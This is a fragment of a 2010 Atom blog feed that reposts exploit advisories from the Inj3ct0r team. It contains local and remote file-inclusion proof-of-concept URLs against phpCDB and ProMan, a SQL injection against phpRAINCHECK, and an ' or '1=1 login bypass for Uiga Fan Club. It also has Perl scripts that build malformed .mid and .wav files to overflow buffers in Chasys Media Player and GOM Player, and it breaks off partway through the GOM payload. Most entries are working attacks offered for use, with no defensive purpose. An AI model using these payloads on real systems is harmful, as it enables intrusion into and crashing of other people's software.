(Auth Bypass) SQL Injection Vulnerability'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-8922732695721488641</id><published>2010-03-04T10:27:00.001-08:00</published><updated>2010-03-04T10:27:51.501-08:00</updated><title type='text'>phpCDB &lt;= 1.0 Local File Include Vulnerability</title><content type='html'># 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0&lt;br /&gt;# 0     _                   __           __       __                     1&lt;br /&gt;# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0&lt;br /&gt;# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1&lt;br /&gt;# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0&lt;br /&gt;# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1&lt;br /&gt;# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0&lt;br /&gt;# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1&lt;br /&gt;# 1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0&lt;br /&gt;# 0                   \/___/          type (local, remote, DoS, etc.)    1&lt;br /&gt;# 1                                                                      1&lt;br /&gt;# 0  [+] Site            : Inj3ct0r.com                                  0&lt;br /&gt;# 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1&lt;br /&gt;# 0                                                                      0&lt;br /&gt;# 1                    ######################################            1&lt;br /&gt;# 0                    I'm cr4wl3r  member from Inj3ct0r Team            1&lt;br /&gt;# 1                    ######################################            0&lt;br /&gt;# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1&lt;br /&gt;&lt;br /&gt;#[+] Discovered By: cr4wl3r&lt;br /&gt;&lt;br /&gt;PoC:&lt;br /&gt; [phpcdb_path]/firstvisit.php?lang_global=[LFI]&lt;br /&gt; [phpcdb_path]/newfolder.php?lang_global=[LFI]&lt;br /&gt; [phpcdb_path]/showfolders.php?lang_global=[LFI]&lt;br /&gt; [phpcdb_path]/newlang.php?lang_global=[LFI]&lt;br /&gt; [phpcdb_path]/showinnerfolder.php?lang_global=[LFI]&lt;br /&gt; [phpcdb_path]/writecode.php?lang_global=[LFI]&lt;br /&gt; [phpcdb_path]/showcode.php?lang_global=[LFI]&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-8922732695721488641?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/8922732695721488641/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/phpcdb-10-local-file-include.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/8922732695721488641'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/8922732695721488641'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/phpcdb-10-local-file-include.html' title='phpCDB &lt;= 1.0 Local File Include Vulnerability'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-2443803611650183391</id><published>2010-03-04T10:26:00.000-08:00</published><updated>2010-03-04T10:27:29.141-08:00</updated><title type='text'>phpRAINCHECK &lt;= 1.0.1 SQL Injection Vulnerability</title><content type='html'># 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0&lt;br /&gt;# 0     _                   __           __       __                     1&lt;br /&gt;# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0&lt;br /&gt;# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1&lt;br /&gt;# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0&lt;br /&gt;# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1&lt;br /&gt;# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0&lt;br /&gt;# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1&lt;br /&gt;# 1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0&lt;br /&gt;# 0                   \/___/          type (local, remote, DoS, etc.)    1&lt;br /&gt;# 1                                                                      1&lt;br /&gt;# 0  [+] Site            : Inj3ct0r.com                                  0&lt;br /&gt;# 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1&lt;br /&gt;# 0                                                                      0&lt;br /&gt;# 1                    ######################################            1&lt;br /&gt;# 0                    I'm cr4wl3r  member from Inj3ct0r Team            1&lt;br /&gt;# 1                    ######################################            0&lt;br /&gt;# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1&lt;br /&gt;&lt;br /&gt;#[+] Discovered By: cr4wl3r&lt;br /&gt;&lt;br /&gt;PoC:&lt;br /&gt; [phpRAINCHECK_path]/print_raincheck.php?id=[SQL]&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-2443803611650183391?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/2443803611650183391/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/phpraincheck-101-sql-injection.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/2443803611650183391'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/2443803611650183391'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/phpraincheck-101-sql-injection.html' title='phpRAINCHECK &lt;= 1.0.1 SQL Injection Vulnerability'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-5082075121280769272</id><published>2010-03-04T10:25:00.000-08:00</published><updated>2010-03-04T10:26:20.575-08:00</updated><title type='text'>ProMan  &lt;= 0.1.1 Multiple File Include Vulnerability</title><content type='html'># 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0&lt;br /&gt;# 0     _                   __           __       __                     1&lt;br /&gt;# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0&lt;br /&gt;# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1&lt;br /&gt;# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0&lt;br /&gt;# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1&lt;br /&gt;# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0&lt;br /&gt;# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1&lt;br /&gt;# 1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0&lt;br /&gt;# 0                   \/___/          type (local, remote, DoS, etc.)    1&lt;br /&gt;# 1                                                                      1&lt;br /&gt;# 0  [+] Site            : Inj3ct0r.com                                  0&lt;br /&gt;# 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1&lt;br /&gt;# 0                                                                      0&lt;br /&gt;# 1                    ######################################            1&lt;br /&gt;# 0                    I'm cr4wl3r  member from Inj3ct0r Team            1&lt;br /&gt;# 1                    ######################################            0&lt;br /&gt;# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1&lt;br /&gt;&lt;br /&gt;#[+] Discovered By: cr4wl3r&lt;br /&gt;&lt;br /&gt;[RFI Code]&lt;br /&gt; &lt;br /&gt;&lt;?php&lt;br /&gt;                    if (!($_GET['page']))&lt;br /&gt;                        include('info.php');&lt;br /&gt;                    else   &lt;br /&gt;                        include $_GET['page'].'.php';&lt;br /&gt;                ?&gt;&lt;br /&gt; &lt;br /&gt;[LFI Code]&lt;br /&gt; &lt;br /&gt;include_once('lang/'.$_SESSION['userLang'].'/elisttasks.php');&lt;br /&gt;if (!defined('PROMAN'))&lt;br /&gt;    pexit ($l['no hack']);&lt;br /&gt;##############################################################&lt;br /&gt;PoC RFI:&lt;br /&gt; [phpRAINCHECK_path]/_center.php?page=[Shell]&lt;br /&gt;##############################################################&lt;br /&gt;PoC LFI:&lt;br /&gt; [ProMan_path]/elisttasks.php?_SESSION[userLang]=[LFI]&lt;br /&gt; [ProMan_path]/managepmanagers.php?_SESSION[userLang]=[LFI]&lt;br /&gt; [ProMan_path]/manageusers.php?_SESSION[userLang]=[LFI]&lt;br /&gt; [ProMan_path]/helpfunc.php?_SESSION[userLang]=[LFI]&lt;br /&gt; [ProMan_path]/managegroups.php?_SESSION[userLang]=[LFI]&lt;br /&gt; [ProMan_path]/manageprocess.php?_SESSION[userLang]=[LFI]&lt;br /&gt; [ProMan_path]/manageusersgroups.php?_SESSION[userLang]=[LFI]&lt;br /&gt; &lt;br /&gt;others...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-5082075121280769272?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/5082075121280769272/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/proman-011-multiple-file-include.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/5082075121280769272'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/5082075121280769272'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/proman-011-multiple-file-include.html' title='ProMan  &lt;= 0.1.1 Multiple File Include Vulnerability'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-6657187040422677917</id><published>2010-03-04T10:24:00.002-08:00</published><updated>2010-03-04T10:25:18.876-08:00</updated><title type='text'>Uiga Fan Club &lt;= 1.0 (Auth Bypass) SQL Injection Vulnerability</title><content type='html'># 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0&lt;br /&gt;# 0     _                   __           __       __                     1&lt;br /&gt;# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0&lt;br /&gt;# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1&lt;br /&gt;# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0&lt;br /&gt;# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1&lt;br /&gt;# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0&lt;br /&gt;# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1&lt;br /&gt;# 1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0&lt;br /&gt;# 0                   \/___/          type (local, remote, DoS, etc.)    1&lt;br /&gt;# 1                                                                      1&lt;br /&gt;# 0  [+] Site            : Inj3ct0r.com                                  0&lt;br /&gt;# 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1&lt;br /&gt;# 0                                                                      0&lt;br /&gt;# 1                    ######################################            1&lt;br /&gt;# 0                    I'm cr4wl3r  member from Inj3ct0r Team            1&lt;br /&gt;# 1                    ######################################            0&lt;br /&gt;# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1&lt;br /&gt;&lt;br /&gt;#[+] Discovered By: cr4wl3r&lt;br /&gt;&lt;br /&gt;###########################################################################&lt;br /&gt;#if (isset($_POST['admin_name']))&lt;br /&gt;# {&lt;br /&gt;# $admin_name=$_POST['admin_name'];&lt;br /&gt;# $admin_password=$_POST['admin_password'];&lt;br /&gt;#&lt;br /&gt;#&lt;br /&gt;# if(empty($admin_name))&lt;br /&gt;# {&lt;br /&gt;# $errorMessage=warning." Username is empty!";&lt;br /&gt;# }&lt;br /&gt;# elseif(empty($admin_password))&lt;br /&gt;# {&lt;br /&gt;# $errorMessage=warning." Password is empty!";&lt;br /&gt;# }&lt;br /&gt;#&lt;br /&gt;#&lt;br /&gt;# else&lt;br /&gt;# {&lt;br /&gt;# $sql="SELECT *&lt;br /&gt;#      FROM admin&lt;br /&gt;#      WHERE admin_name='$admin_name' and admin_password='$admin_password'";&lt;br /&gt;#&lt;br /&gt;###########################################################################&lt;br /&gt; &lt;br /&gt;###############################################&lt;br /&gt;PoC: [path]/admin/admin_login.php&lt;br /&gt; &lt;br /&gt;     Username: ' or '1=1&lt;br /&gt;     password: ' or '1=1&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-6657187040422677917?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/6657187040422677917/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/uiga-fan-club-10-auth-bypass-sql.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/6657187040422677917'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/6657187040422677917'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/uiga-fan-club-10-auth-bypass-sql.html' title='Uiga Fan Club &lt;= 1.0 (Auth Bypass) SQL Injection Vulnerability'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-3021043339090116814</id><published>2010-03-04T10:24:00.001-08:00</published><updated>2010-03-04T10:24:49.266-08:00</updated><title type='text'>Chasys Media Player 1.1 (.mid) Local Buffer Overflow</title><content type='html'># 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0&lt;br /&gt;# 0     _                   __           __       __                     1&lt;br /&gt;# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0&lt;br /&gt;# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1&lt;br /&gt;# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0&lt;br /&gt;# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1&lt;br /&gt;# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0&lt;br /&gt;# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1&lt;br /&gt;# 1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0&lt;br /&gt;# 0                   \/___/          type (local, remote, DoS, etc.)    1&lt;br /&gt;# 1                                                                      1&lt;br /&gt;# 0  [+] Site            : Inj3ct0r.com                                  0&lt;br /&gt;# 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1&lt;br /&gt;# 0                                                                      0&lt;br /&gt;# 1                    ######################################            1&lt;br /&gt;# 0                    I'm cr4wl3r  member from Inj3ct0r Team            1&lt;br /&gt;# 1                    ######################################            0&lt;br /&gt;# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1&lt;br /&gt;&lt;br /&gt;#[+] Discovered By: cr4wl3r&lt;br /&gt;&lt;br /&gt;print "&lt;br /&gt;[+]-------------------------------------------------------[+]&lt;br /&gt;[+] Chasys Media Player 1.1 (.mid) Local Buffer Overflow  [+]&lt;br /&gt;[+] By : cr4wl3r &lt;cr4wl3r\x40linuxmail\x2Eorg&gt;            [+]&lt;br /&gt;[+]-------------------------------------------------------[+]&lt;br /&gt;";&lt;br /&gt; &lt;br /&gt; &lt;br /&gt;$buff =&lt;br /&gt;"\x52\x49\x46\x46\xff\xff\x00\x00\x52\x4d\x49\x44\x64\x64\x64\x64" .&lt;br /&gt;"\xf8\xff\xff\xff\x4d\x54\x68\x64\xff\xff\xff\xff\xf8\xff\xff\xf8" .&lt;br /&gt;"\xf8\xff\xff\xff\xf7\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" .&lt;br /&gt;"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" .&lt;br /&gt;"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff";&lt;br /&gt; &lt;br /&gt;open(file, "&gt; sploit.mid");&lt;br /&gt;print (file $buff);&lt;br /&gt;print "\n\n[+] Done...!!!\n&lt;br /&gt;[+] Open with Chasys Media Player\n&lt;br /&gt;[+] Coded by cr4wl3r\n";&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-3021043339090116814?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/3021043339090116814/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/chasys-media-player-11-mid-local-buffer.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/3021043339090116814'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/3021043339090116814'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/chasys-media-player-11-mid-local-buffer.html' title='Chasys Media Player 1.1 (.mid) Local Buffer Overflow'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-294260708924784588</id><published>2010-03-04T10:23:00.002-08:00</published><updated>2010-03-04T10:24:22.753-08:00</updated><title type='text'>GOM Player 2.1.21.4846 (.wav) Buffer Overflow Exploit</title><content type='html'># 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0&lt;br /&gt;# 0     _                   __           __       __                     1&lt;br /&gt;# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0&lt;br /&gt;# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1&lt;br /&gt;# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0&lt;br /&gt;# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1&lt;br /&gt;# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0&lt;br /&gt;# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1&lt;br /&gt;# 1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0&lt;br /&gt;# 0                   \/___/          type (local, remote, DoS, etc.)    1&lt;br /&gt;# 1                                                                      1&lt;br /&gt;# 0  [+] Site            : Inj3ct0r.com                                  0&lt;br /&gt;# 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1&lt;br /&gt;# 0                                                                      0&lt;br /&gt;# 1                    ######################################            1&lt;br /&gt;# 0                    I'm cr4wl3r  member from Inj3ct0r Team            1&lt;br /&gt;# 1                    ######################################            0&lt;br /&gt;# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1&lt;br /&gt;&lt;br /&gt;#[+] Discovered By: cr4wl3r&lt;br /&gt;&lt;br /&gt;print "&lt;br /&gt;[+]-------------------------------------------------------[+]&lt;br /&gt;[+] GOM Player 2.1.21.4846 (.wav) Buffer Overflow Exploit [+]&lt;br /&gt;[+] By : cr4wl3r                                          [+]&lt;br /&gt;[+]-------------------------------------------------------[+]&lt;br /&gt;";&lt;br /&gt; &lt;br /&gt; &lt;br /&gt; &lt;br /&gt;$buff =&lt;br /&gt;"\x4d\x54\x68\x64\x00\x00\x00\x06\x00\x01\x00\x03\x00\xf0\x4d\x54\x72\x6b\x00\x00".&lt;br /&gt;"\x00\x21\x00\xff\x51\x03\x0a\x2c\x2a\x00\xff\x58\x04\x02\x02\x18\x08\x00\xff\x03".&lt;br /&gt;"\x08\x20\x20\x20\x20\x20\x20\x20\x20\x85\x88\x61\xff\x2f\x00\x4d\x54\x72\x6b\x00".&lt;br /&gt;"\x00\x27\x6b\x00\xff\x03\x08\x41\x20\x42\x72\x65\x65\x7a\x65\x00\xc1\x07\x00\x07".&lt;br /&gt;"\x82\x69\x91\x43\x3d\x00\x40\x3d\x64\x43\x00\x00\x40\x00\x13\x48\x3f\x00\x3f\x3f".&lt;br /&gt;"\x65\x48\x00\x00\x3f\x00\x13\x45\x3f\x29\x45\x00\x13\x44\x3f\x29\x44\x00\x13\x45".&lt;br /&gt;"\x65\x29\x45\x00\x13\x47\x3f\x29\x47\x00\x13\x48\x3f\x00\x40\x3f\x81\x21\x48\x00".&lt;br /&gt;"\x00\x40\x00\x13\x43\x3f\x29\x43\x00\x13\x40\x3f\x29\x40\x00\x13\x3f\x3f\x29\x3f".&lt;br /&gt;"\x00\x13\x40\x3f\x29\x40\x00\x13\x41\x3f\x29\x41\x00\x13\x43\x3f\x81\x21\x43\x00".&lt;br /&gt;"\x13\x41\x3f\x29\x41\x00\x13\x3e\x3f\x29\x3e\x00\x13\x3c\x3f\x29\x3c\x00\x13\x40".&lt;br /&gt;"\x3f\x29\x40\x00\x13\x3e\x3f\x29\x3e\x00\x13\x3b\x3f\x29\x3b\x00\x13\x39\x3f\x29".&lt;br /&gt;"\x39\x00\x13\x37\x3f\x65\x37\x00\x81\x0c\x4f\x3d\x00\x4a\x3d\x00\x47\x3d\x00\x43".&lt;br /&gt;"\x3d\x64\x4f\x00\x00\x4a\x00\x00\x47\x00\x00\x43\x00\x13\x43\x3f\x65\x43\x00\x13".&lt;br /&gt;"\x4c\x51\x00\x43\x51\x29\x4c\x00\x00\x43\x00\x13\x4b\x51\x00\x42\x51\x29\x4b\x00".&lt;br /&gt;"\x00\x42\x00\x13\x4c\x51\x00\x43\x51\x29\x4c\x00\x00\x43\x00\x13\x48\x51\x00\x40".&lt;br /&gt;"\x51\x65\x48\x00\x00\x40\x00\x13\x40\x51\x29\x40\x00\x13\x41\x51\x29\x41\x00\x13".&lt;br /&gt;"\x42\x51\x29\x42\x00\x13\x43\x51\x29\x43\x00\x13\x48\x51\x29\x48\x00\x13\x4c\x51".&lt;br /&gt;"\x29\x4c\x00\x13\x4f\x54\x00\x4c\x54\x01\x43\x54\x64\x4f\x00\x00\x4c\x00\x00\x43".&lt;br /&gt;"\x00\x13\x4e\x54\x00\x4b\x54\x00\x42\x54\x29\x4e\x00\x00\x4b\x00\x00\x42\x00\x13".&lt;br /&gt;"\x4f\x54\x00\x4c\x54\x00\x43\x54\x65\x4f\x00\x00\x4c\x00\x00\x43\x00\x13\x4c\x51".&lt;br /&gt;"\x00\x43\x51\x29\x4c\x00\x00\x43\x00\x13\x4b\x51\x00\x42\x51\x29\x4b\x00\x00\x42".&lt;br /&gt;"\x00\x13\x4c\x51\x00\x43\x51\x29\x4c\x00\x00\x43\x00\x13\x48\x51\x00\x40\x51\x65".&lt;br /&gt;"\x48\x00\x00\x40\x00\x13\x40\x51\x29\x40\x00\x13\x41\x51\x29\x41\x00\x13\x41\x51".&lt;br /&gt;"\x29\x41\x00\x13\x43\x51\x29\x43\x00\x13\x48\x51\x29\x48\x00\x13\x4c\x51\x29\x4c".&lt;br /&gt;"\x00\x13\x4f\x51\x00\x4c\x51\x01\x43\x64\x64\x4f\x00\x00\x4c\x00\x00\x43\x00\x13".&lt;br /&gt;"\x4d\x51\x00\x4a\x51\x00\x42\x64\x29\x4d\x00\x00\x4a\x00\x00\x42\x00\x13\x4f\x51".&lt;br /&gt;"\x00\x4c\x51\x00\x43\x64\x65\x4f\x00\x00\x4c\x00\x00\x43\x00\x13\x4f\x51\x00\x43".&lt;br /&gt;"\x51\x29\x4f\x00\x00\x43\x00\x13\x50\x51\x00\x44\x51\x01\x4d\x64\x28\x50\x00\x00".&lt;br /&gt;"\x44\x00\x00\x4d\x00\x13\x51\x51\x00\x45\x51\x00\x4d\x64\x29\x51\x00\x00\x45\x00".&lt;br /&gt;"\x00\x4d\x00\x13\x53\x51\x00\x47\x51\x00\x4d\x64\x65\x53\x00\x00\x47\x00\x00\x4d".&lt;br /&gt;"\x00\x13\x4f\x51\x00\x43\x51\x00\x4d\x64\x29\x4f\x00\x00\x43\x00\x00\x4d\x00\x13".&lt;br /&gt;"\x51\x51\x00\x45\x51\x00\x4d\x64\x29\x51\x00\x00\x45\x00\x00\x4d\x00\x13\x53\x51".&lt;br /&gt;"\x00\x47\x51\x00\x4d\x64\x29\x53\x00\x00\x47\x00\x00\x4d\x00\x13\x54\x51\x00\x48".&lt;br /&gt;"\x51\x00\x4c\x64\x29\x54\x00\x00\x48\x00\x00\x4c\x00\x13\x53\x51\x00\x47\x51\x00".&lt;br /&gt;"\x4c\x64\x29\x53\x00\x00\x47\x00\x00\x4c\x00\x13\x54\x51\x00\x48\x51\x00\x4c\x64".&lt;br /&gt;"\x29\x54\x00\x00\x48\x00\x00\x4c\x00\x13\x58\x51\x00\x4c\x51\x00\x4f\x64\x29\x58".&lt;br /&gt;"\x00\x00\x4c\x00\x13\x58\x51\x00\x4c\x51\x29\x58\x00\x00\x4c\x00\x00\x4f\x00\x13".&lt;br /&gt;"\x57\x69\x00\x4b\x69\x29\x57\x00\x00\x4b\x00\x13\x58\x69\x00\x4c\x69\x65\x58\x00".&lt;br /&gt;"\x00\x4c\x00\x13\x58\x69\x29\x58\x00\x13\x56\x69\x29\x56\x00\x13\x55\x69\x29\x55".&lt;br /&gt;"\x00\x13\x56\x69\x65\x56\x00\x13\x54\x69\x00\x4c\x69\x29\x54\x00\x00\x4c\x00\x13".&lt;br /&gt;"\x53\x69\x00\x4a\x69\x29\x53\x00\x00\x4a\x00\x13\x51\x69\x00\x48\x69\x29\x51\x00".&lt;br /&gt;"\x00\x48\x00\x13\x4f\x69\x00\x47\x69\x82\x55\x4f\x00\x00\x47\x00\x13\x4d\x69\x00".&lt;br /&gt;"\x4a\x69\x01\x47\x64\x00\x43\x64\x64\x4d\x00\x00\x4a\x00\x00\x47\x00\x00\x43\x00".&lt;br /&gt;"\x13\x4c\x51\x00\x43\x51\x00\x48\x64\x29\x4c\x00\x00\x43\x00\x00\x48\x00\x13\x4b".&lt;br /&gt;"\x51\x00\x42\x51\x29\x4b\x00\x00\x42\x00\x13\x4c\x51\x00\x43\x51\x29\x4c\x00\x00".&lt;br /&gt;"\x43\x00\x13\x48\x51\x00\x40\x51\x65\x48\x00\x00\x40\x00\x13\x40\x51\x29\x40\x00".&lt;br 